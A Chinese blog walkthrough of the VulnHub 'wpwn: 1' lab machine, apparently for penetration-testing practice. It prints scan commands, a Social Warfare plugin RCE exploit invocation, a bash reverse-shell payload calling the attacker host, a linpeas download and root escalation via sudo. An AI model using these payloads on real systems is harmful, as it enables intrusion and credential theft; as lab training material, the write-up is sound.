vulnhub wpwn: 1

最新推荐文章于 2023-01-15 16:20:57 发布
最新推荐文章于 2023-01-15 16:20:57 发布
阅读量822 收藏 1
点赞数 1
分类专栏: vulnhub 文章标签: wpscan wordpress RCE bash_history
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/125953653
版权

渗透思路:

nmap扫描 ---- gobuster扫描网站目录 ---- wpscan扫描发现漏洞插件 ---- 利用wordpress插件Social Warfare的RCE漏洞getshell(无需登录)---- wordpress配置文件泄露明文密码,切换到用户takis ---- sudo su提权 ---- 查看.bash_history发现flag

环境信息:

靶机:192.168.101.87

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.87

只扫描到TCP 22(ssh)和80(http)端口

2、wpscan扫描发现漏洞插件

浏览器访问靶机80端口,出现下图的页面,好像也没啥有用的信息

gobuster扫描网站目录,发现http://192.168.101.87/wordpress/

​gobuster dir -u http://192.168.101.87 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

浏览器访问http://192.168.101.87/wordpress/时无法正确加载,直接用wpscan扫描

​wpscan --url http://192.168.101.87/wordpress/ -e

扫描到用户admin,但是后续试了几个小字典用wpscan爆破admin的密码没有爆破出来,用rockyou.txt又爆破的超级超级慢,遂放弃

wpscan还扫描到plugin: social-warfare版本3.5.2

3、利用插件Social Warfare的RCE漏洞getshell(无需登录)

在exploit-db上搜索wordpress social,发现一个:WordPress Plugin Social Warfare < 3.5.3 - Remote Code Execution(WordPress Plugin Social Warfare < 3.5.3 - Remote Code Execution - PHP webapps Exploit

点击进入,并下载exp:46794.py。但是下载下来的exp不怎么会用,发现exp中有一个github的url(GitHub - hash3liZer/CVE-2019-9978: CVE-2019-9978 - (PoC) RCE in Social WarFare Plugin (<=3.5.2)),访问后发现用法示例

按照示例在攻击机上起http服务

python2 -m SimpleHTTPServer 80

新建一个文件名为payload.txt,内容如下

<pre>system('cat /etc/passwd')</pre>

然后执行exp脚本,发现返回了/etc/passwd的内容,说明漏洞存在,且利用成功

​python2 46794.py --target http://192.168.101.87/wordpress/ --payload-uri http://192.168.101.34/payload.txt

将payload.txt中执行的命令改成bash反弹shell命令

<pre>system('bash -c "exec bash -i &>/dev/tcp/192.168.101.34/8888 <&1"')</pre>

在攻击机上nc监听8888端口

nc -nlvp 8888

然后执行exp脚本,即可获得靶机www-data用户的反弹shell

​python2 46794.py --target http://192.168.101.87/wordpress/ --payload-uri http://192.168.101.34/payload.txt

再在靶机shell中执行如下命令,得到tty

python -c 'import pty; pty.spawn("/bin/bash")'

进入靶机shell后,先来到/home目录下,发现只有一个用户takis的家目录,进入/home/takis后发现第一个flag:user.txt

4、wordpress配置文件泄露数据库密码,切换用户到takis

在靶机shell上找了一圈没找到提权方法,只好从攻击机上下载了linpeas.sh到靶机/tmp目录并执行

wget http://192.168.101.34/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

从执行结果中发现,/var/www/html/wordpress/wp-config.php 中明文记录了数据库用户名wp_user和密码R3&]vzhHmMn9,:-5

define( 'DB_NAME', 'wordpress_db' );

define( 'DB_USER', 'wp_user' );

define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );

define( 'DB_HOST', 'localhost' );

另外从本地开放了端口3306来看,数据库应该是mysql,后续尝试了用wp_user进行mysql登录,可以登录成功,但数据库中没有什么有用的信息。

尝试切换到用户takis

su - takis

密码用wp_user的数据库密码: R3&]vzhHmMn9,:-5

切换成功。

5、sudo su提权

查看takis是否可以sudo执行命令,发现其可以以任何用户的身份sudo执行任何命令

sudo -l

执行如下命令提权到root,但在/root/root.txt中并没有flag,只有一段提示:take a look into my USB

sudo su -

6、查看.bash_history发现flag

由于在/root目录下并没有USB文件夹,因此在没有别的线索的情况下尝试查看.bash_history文件,确实有所发现

cat .bash_history

下图中高亮部分显示flag应该在/usr/games/USB/root文件中

进入/usr/games/USB文件夹,确实有root文件,查看其内容,确实是flag~

仙女象
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机系列:pWnOS: 2.0
汗的博客
03-30 1545
文章目录靶机地址靶机设置利用知识信息收集并getshell提权 靶机地址 https://www.vulnhub.com/entry/pwnos-20-pre-release,34/ 靶机设置 靶机默认设置: IP: 10.10.10.100 Netmask: 255.255.255.0 Gateway: 10.10.10.15 所以攻击机需要在10.10.10.0/24网段 我在虚拟网络编辑器里...
VulnHub靶场MONEYBOX:1
01-05
MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成各种挑战,提权、漏洞利用、代码审计等,最终获得root权限并发现flag。 在...
vulnhub:wpwn靶机
qq_43884092的博客
01-09 298
靶机:192.168.111.145端口扫描目录爆破使用wpscan发现插件存在漏洞。
Vulnhub-Pwned
dahege666的博客
05-30 575
靶机IP:192.168.1.9 攻击机IP:192.168.1.7 1、扫描靶机开放端口及服务 2、访问80端口,没什么有用的信息 3、扫描一下目标的敏感信息有一个robots.txt, 4、访问nothing目录,有一个nothing.html,查看源码 也没有有用的信息 5、使用gobuster扫描目录,找到hidden_text 6、访问后有一个.dic字段文件 7、将文件下周下来,然后进行目录扫描,只有pwned.vuln是能访问的。 .
vulnhub刷题记录(Pwn The Tron:1)
ailx10
08-31 832
英文名称:Pwn The Tron:1中文名称:Pwn The Tron:1发布日期:2021 年 7 月 2 日难度:容易描述:类型:线性CTF下载地址:https://www.vulnhub.com/entry/pwn-the-tron-1,721/ 1、主机发现主机发现2、端口扫描端口扫描3、目录发现目录发现4、访问页面访问页面5、访问图片,其中图3、图4可能隐藏信息,但是暴力破解不了密码...
No.22-VulnHub-pWnOS: 2.0 (Pre-Release)-Walkthrough渗透学习
qq_34801745的博客
01-19 708
** VulnHub-pWnOS: 2.0 (Pre-Release)-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/pwnos-20-pre-release,34/ 靶机难度:中级(CTF) 靶机发布日期:2011年7月4日 靶机描述:pWnOS v2.0是一个Virutal机器映像,它托管一个服务器以进行实践渗透测试。它将测试您利用服务器的...
打靶练习vulnhub: stapler
最新发布
03-28
打靶练习vulnhub: stapler
打靶练习vulnhub: haclabs
03-20
打靶练习vulnhub: haclabs
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
VulnHub:VulnHub Box演练
03-16
VulnHub:VulnHub Box演练
pwn环境搭建_【Vulnhub】bossplayersCTF与两道PWN
weixin_35930794的博客
12-21 164
扫不到 IP 可以参考之前的文章:Vulnhub分配IP问题 | w4sp-lab环境搭建改了之后就扫到了扫描一下端口nmap-p--A192.168.149.173查看网页源码,最下面有个 base64,解出来看看解了 3 次,解出来个workinginprogress.php访问一下,看着这个页面莫名其妙的感觉应该有命令执行...试了一下...这...kali 上面监听一下访问...
No.18-VulnHub-PwnLab: init-Walkthrough渗透学习
qq_34801745的博客
01-15 1730
** VulnHub-PwnLab: init-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/pwnlab-init,158/ 靶机难度:中级(CTF) 靶机发布日期:2016年8月1日 靶机描述:Wellcome to “PwnLab: init”, my first Boot2Root virtual machine. Meant to b...
pwn靶机安装
qq_33899138的博客
02-06 467
https://github.com/giantbranch/pwn-env-init 下载ubuntu16.04 解压文件打开即可
wordpress靶机渗透
badminton_0的博客
08-06 654
访问靶机网页,是一个wordpress站点 使用awvs扫描发现弱口令密码 Dirb扫描网站目录phpmyadmin,wp-login.php 登陆admin,发现 flag1 在此网站目录下找到flag2 wpscan扫描用户,写入user.txt cewl生成字典 wpscan爆破 获得密码 使用wordpress 登录 得到flag4 flag3 登陆后台修改404页面写入脚本 蚁剑...
BUUCTF之PWN(WP1)
NANMUZN的博客
01-15 632
buuctf pwn
vulnhub靶机-THALES: 1
臭nana的博客
03-18 4587
1、找到靶机ip:192.168.1.106 nmap -sn 192.168.1.0/24 2、扫描靶机端口,开放22和8080端口 3、先搜索对应中间件有没有公开漏洞,没有发现,于是先从8080端口入手,访问之后是一个tomcat服务默认页面,先扫描一下目录 可疑的就只有shell目录,但是访问就一直转圈,跟平常反弹shell的页面一样,所以猜测应该是作者测试时上传的,结合tomcat和shell目录,可以猜想应该是tomcat后台布置war包getshell,但是管理后台需要...
靶机练习 No.23 Vulnhub靶机DarkHole 2 .git信息泄露 .bash_history历史命令提权
YouthBelief的博客
02-11 2934
靶机练习 No.23 Vulnhub靶机DarkHole 20x00 环境准备0x01 信息收集步骤一:ip 探测步骤二 :端口扫描0x02 漏洞挖掘思路一:web漏洞挖掘(.git信息收集)思路二:22ssh 爆破步骤一:githack.py收集.git步骤二:从git仓库审查代码及数据库文件(1)config/config.php(2)审计index.php login.php dashboard.php步骤三:git-dumper查看git log记录(1)脚本递归下载git目录(2)git log
DVWA教程(一) —— Low级别
weixin_47610939的博客
04-29 1966
本篇文章为各位正在学习DVWA提供解题思路,同时也是本人的学习笔记,本文中的方法仅为验证漏洞,并无攻击目的。DVWA安装,可以使用docker容器,非常简单方便,通过以下链接: Docker Hubhttps://hub.docker.com/r/sagikazarmark/dvwa 0x01. 暴力破解 0x02. 代码注入 先看题目,是一个ping命令 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get in...
vulnhub-So Simple 1
yutianovo的博客
08-10 1327
靶机描述 This is an easy level VM with some rabbitholes. Enumeration is key to find your way in. There are three flags (2 user and 1 root flag). The VM is tested on Virtualbox. After the startup it shows the IP address. Share your rootflag with me on Twitter
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值